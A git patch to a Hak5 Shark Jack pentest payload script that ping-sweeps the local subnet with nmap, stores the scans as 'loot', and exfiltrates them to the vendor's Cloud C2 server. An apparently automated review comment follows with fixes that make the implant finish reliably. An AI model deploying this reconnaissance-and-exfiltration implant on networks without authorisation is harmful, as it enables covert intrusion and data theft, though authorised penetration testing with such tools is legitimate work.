From 205b13abb4f7e0992ce0abc29d3b62967f3a6c0f Mon Sep 17 00:00:00 2001
From: Darren Kitchen
Date: Tue, 14 Jul 2020 08:48:38 -0700
Subject: [PATCH] Update payload.sh
---
 payloads/library/recon/Nmap-C2/payload.sh | 133 ++++++----------------
 1 file changed, 34 insertions(+), 99 deletions(-)
diff --git a/payloads/library/recon/Nmap-C2/payload.sh b/payloads/library/recon/Nmap-C2/payload.sh
index f41f2df..c9cad9b 100644
--- a/payloads/library/recon/Nmap-C2/payload.sh
+++ b/payloads/library/recon/Nmap-C2/payload.sh
@@ -2,7 +2,7 @@
 #
 # Title: Nmap Payload for Shark Jack w/ C2
 # Author: Hak5 (modifications from REDD)
-# Version: 1.0
+# Version: 1.1
 #
 # All credit goes to Hak5 Team. I just through in a simple check for if
 # C2 is provisioned in the SharkJack. - If so, exfiltrate! 
@@ -10,110 +10,45 @@
 # Scans target subnet with Nmap using specified options. Saves each scan result
 # to loot storage folder. Exfiltrates all scans to C2 if provisioned.
 #
-# Red ...........Setup
-# Amber..........Scanning
-# White..........Exfiltrating to C2
-# Green..........Finished
+# LED SETUP ... Obtaining IP address from DHCP
+# LED ATTACK ... Scanning
+# LED FINISH ... Scan Complete
 #
 # See nmap --help for options. Default "-sP" ping scans the address space for
 # fast host discovery.
 C2PROVISION="/etc/device.config"
-NMAP_OPTIONS="-sP"
+NMAP_OPTIONS="-sP --host-timeout 30s --max-retries 3"
 LOOT_DIR=/root/loot/nmap
-SCAN_DIR=/etc/shark/nmap
+# Setup loot directory, DHCP client, and determine subnet
+LED SETUP
+mkdir -p $LOOT_DIR
+COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1))
+NETMODE DHCP_CLIENT
+while [ -z "$SUBNET" ]; do
+ sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
+done
+
+# Scan network
+LED ATTACK
+nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt
+# Exfiltrate Loot to Cloud C2
+if [[ -f "$C2PROVISION" ]]; then
+ LED SPECIAL
+ # Connect to Cloud C2
+ C2CONNECT
+ # Wait until Cloud C2 connection is established
+ while ! pgrep cc-client; do sleep 1; done
+ # Exfiltrate all test loot files
+ FILES="$LOOT_DIR/*.txt"
+ for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Payload; done
+else
+ # Exit script if not provisioned for C2
+ LED R SOLID
+ exit 1
+fi
-function finish() {
-
- LED CLEANUP
- # Kill Nmap
- wait $1
- kill $1 &> /dev/null
-
- # Sync filesystem
- echo $SCAN_M > $SCAN_FILE
- sync
- sleep 1
-
- # C2 Connect and send files
- if [[ -f "$C2PROVISION" ]]; then
- LED W FAST
- c2_connect
- sleep 1
- fi
-
- LED FINISH
- sleep 1
-
- # Halt system
- halt
-}
-
-function setup() {
- LED SETUP
- # Create loot directory
- mkdir -p $LOOT_DIR &> /dev/null
-
- # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+
- NETMODE DHCP_CLIENT
- # Wait for an IP address to be obtained - Blink cyan while waiting for IP
- while ! ifconfig eth0 | grep "inet addr"; do sleep 1;LED C SOLID;sleep .1;LED SETUP; done
-
- # Create tmp scan directory
- mkdir -p $SCAN_DIR &> /dev/null
-
- # Create tmp scan file if it doesn't exist
- SCAN_FILE=$SCAN_DIR/scan-count
- if [ ! -f $SCAN_FILE ]; then
- touch $SCAN_FILE && echo 0 > $SCAN_FILE
- fi
-
- i=0
- # Find IP address and subnet
- while [ -z "$SUBNET" ]; do
- sleep 1 && find_subnet
- done
-}
-
-function find_subnet() {
- SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
-}
-
-function c2_connect() {
- if [[ -f "$C2PROVISION" ]]; then
- # Connect to Cloud C2
- C2CONNECT
-
- # Wait until Cloud C2 connection is established
- while ! pgrep cc-client; do sleep 1; done
-
- # Exfiltrate all test loot files
- FILES="$LOOT_DIR/*.txt"
- for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Example; done
- else
- # Exit script if not provisioned for C2
- LED R SOLID
- exit 1
- fi
-}
-
-function run() {
- # Run setup
- setup
-
- SCAN_N=$(cat $SCAN_FILE)
- SCAN_M=$(( $SCAN_N + 1 ))
-
- LED ATTACK
- # Start scan
- nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$SCAN_M.txt &>/dev/null &
- tpid=$!
-
- finish $tpid
-}
-
- # Run payload
-run &
+LED FINISH
+sleep 2 && halt
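Review bot: The `while ! pgrep cc-client; do sleep 1; done` wait inside the new `if [[ -f "$C2PROVISION" ]]` block has no upper bound, so if the Cloud C2 host is unreachable the payload never reaches `LED FINISH` / `halt` and the Shark Jack stays powered with the scan loot on disk (the removed `c2_connect` had the same loop, but the rewrite also drops the blinking `LED C SOLID` from the DHCP wait, so nothing signals a stuck run). A bounded wait, `tries=60; while ! pgrep cc-client >/dev/null && [ "$tries" -gt 0 ]; do sleep 1; tries=$((tries-1)); done`, with the `C2EXFIL` loop guarded by a final `pgrep cc-client >/dev/null &&`, lets the run finish and halt either way. The `else` branch is also now live: an unprovisioned device hits `exit 1` before `halt`, although the header still says scans are exfiltrated only "if provisioned", so dropping `exit 1` in favour of `# not provisioned for C2 - keep loot locally` restores the earlier always-halt behaviour. The new LED legend lists only SETUP/ATTACK/FINISH while the code also uses `LED SPECIAL` (exfiltrating) and `LED R SOLID` (not provisioned); add `# LED SPECIAL ... Exfiltrating to C2` and `# LED R SOLID ... Not provisioned for C2` to it.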